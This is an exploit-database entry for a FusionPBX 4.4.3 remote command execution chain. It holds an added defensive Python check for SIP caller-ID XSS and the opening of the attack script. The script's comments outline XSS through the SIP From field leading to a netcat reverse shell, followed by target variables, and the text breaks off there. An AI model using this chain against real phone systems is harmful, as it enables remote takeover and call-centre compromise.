Exploits / Vulnerability Discovered: 2019-06-12
Type: webapps
Platform: php
This exploit / vulnerability, FusionPBX 4.4.3 remote command execution, is for educational purposes only; if you use it, you do so at your own risk!
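As an added defensive example (not part of the original exploit script): the script that follows delivers its XSS payload in the user part of the SIP From URI, which the operator panel then renders (CVE-2019-11408). This Python check flags From user parts that are not number-like after percent-decoding and shows the output encoding that makes them inert on display; the allowlist, function names and sample messages are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Assumed policy: a caller-ID user part is a short, number-like token.
ALLOWED_USER = re.compile(r"[A-Za-z0-9+\-_.*#]{1,64}")
# From header (or compact form "f"); captures the URI user part before "@".
FROM_USER = re.compile(r"^(?:From|f)\s*:.*?sips?:(.*?)@", re.I | re.M)


def from_user(sip_message):
    """Return the percent-decoded user part of the From URI, or None."""
    m = FROM_USER.search(sip_message)
    return unquote(m.group(1)) if m else None


def check_invite(sip_message):
    """Return (user, flagged, display_html) for one SIP request."""
    user = from_user(sip_message)
    # Flag anything outside the allowlist, judged after percent-decoding.
    flagged = user is not None and ALLOWED_USER.fullmatch(user) is None
    # Output encoding: what a web panel should render instead of the raw value.
    display_html = html.escape(user or "", quote=True)
    return user, flagged, display_html


# Constructed sample messages (not captured traffic).
BENIGN = (
    "INVITE sip:12125551212@pbx.example.com SIP/2.0\r\n"
    'From: "Alice" <sip:15551230000@caller.example.net>;tag=a1\r\n'
    "To: <sip:12125551212@pbx.example.com>\r\n\r\n"
)
# Same message with harmless percent-encoded markup in the user part.
MARKUP = BENIGN.replace("15551230000", "%3Cb%3Etest%3C%2Fb%3E")

if __name__ == "__main__":
    for name, msg in (("benign", BENIGN), ("markup", MARKUP)):
        print(name, check_invite(msg))
```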
#!/usr/bin/python
import socket, sys
from random import randint
from hashlib import md5
# Exploitation steps:
#
# 1. First, encode an XSS payload that will be injected into the
# "Caller ID Number" field, or "User" component of the SIP
# "From" URI.
# 2. Connect to the external SIP profile port and send a SIP INVITE
# packet with the XSS payload injected into the From field.
# 3. The XSS payload will fire in the operator panel screen (CVE-2019-11408),
# which is designed to be monitored constantly by a call center operator.
# 4. Once the XSS code executes, a call is made to the exec.php script
# (CVE-2019-11409) with a reverse shell payload that connects back to
# a netcat listener on the attacker system.
# edit these variables to set up attack
victim_addr="10.10.10.10"
victim_host="victim-pbx1.example.com"
victim_num="12125551212"